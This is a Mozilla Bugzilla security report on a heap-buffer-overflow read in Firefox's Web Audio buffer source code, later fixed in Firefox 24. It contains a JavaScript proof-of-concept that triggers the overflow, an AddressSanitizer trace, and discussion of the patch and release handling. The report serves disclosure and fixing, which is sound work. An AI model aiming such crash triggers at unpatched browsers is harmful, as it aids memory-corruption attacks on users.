Closed Bug 874915 Opened 11 years ago Closed 11 years ago

Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer

Categories

(Core :: Web Audio, defect)

Product:
Core
Component:
Web Audio
Platform:
x86_64
All
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla24
Tracking Flags:
Tracking Status
firefox21 --- unaffected
firefox22 + disabled
firefox23 + disabled
firefox24 + fixed
firefox-esr17 --- unaffected
b2g18 --- unaffected

People

(Reporter: attekett, Assigned: ehsan.akhgari)

References

Details

(4 keywords, Whiteboard: [asan][adv-main24-])

Attachments

(2 files)

Testcase
741 bytes, text/html
Details
Patch (v1)
4.31 KB, patch
roc
: review+
Details | Diff | Splinter Review 
Tested on:

OS: Ubuntu 12.04

Firefox: ASAN opt-build 24.0a1 from 
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/ 

Repro-case:

<script>
var Context0= new AudioContext()
var BufferSource6=Context0.createBufferSource();

setInterval(function(){
BufferSource6.buffer=function(){
	var length=11283;
	var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
	var bufferData= Buffer.getChannelData(0);
	for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(624))};
	return Buffer;
}();
},0)

BufferSource6.start(0.15831333969254047,0.23571860056836158,0.529235512483865);

BufferSource6.buffer=function(){
	var length=48517;
	var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
	var bufferData= Buffer.getChannelData(0);
	for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(365))};
	return Buffer;
}();
</script>


ASAN-report:

==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
    #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
    #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
    #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
    #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
    #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
    #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
OS: Linux → All
Blocks: webaudio
Attached file Testcase 

    
  

        Attachment #752781 -
        Attachment mime type: text/plain → text/html

    
    

    
  
For the analysis, see bug 874934.

    
    

    
  

      
      
      
      

        Attached patch
          
          
        Patch (v1)Splinter Review
      

    


  
Assignee: nobody → ehsan
Status: NEW → ASSIGNED

        Attachment #752894 -
        Flags: review?(roc)

    
  
Blocks: 875617

    
    

    
  
https://hg.mozilla.org/mozilla-central/rev/04d09d48a9f1
Status: ASSIGNED → RESOLVED
Closed: 11 years ago

          status-firefox24:
          affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Flags: sec-bounty?
See Also:  → 878478

    
    

    
  
WebAudio is disabled in Firefox 22 and 23, correct?

          status-firefox22:
          affecteddisabled

          status-firefox23:
          affecteddisabled
Flags: sec-bounty? → sec-bounty+

    
    

    
  
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating. 

https://wiki.mozilla.org/Security/Bug_Approval_Process

We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]

    
    

    
  
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?

Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.

(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?

This is not needed on Beta since Web Audio is disabled there.  And it will be disabled on 23 once it gets to release.  Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...

    
    

    
  
Mass moving Web Audio bugs to the Web Audio component.  Filter on duckityduck.
Component: Video/Audio → Web Audio
Whiteboard: [asan] → [asan][adv-main24-]
Flags: in-testsuite?
Flags: in-testsuite? → in-testsuite+
Group: core-security

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: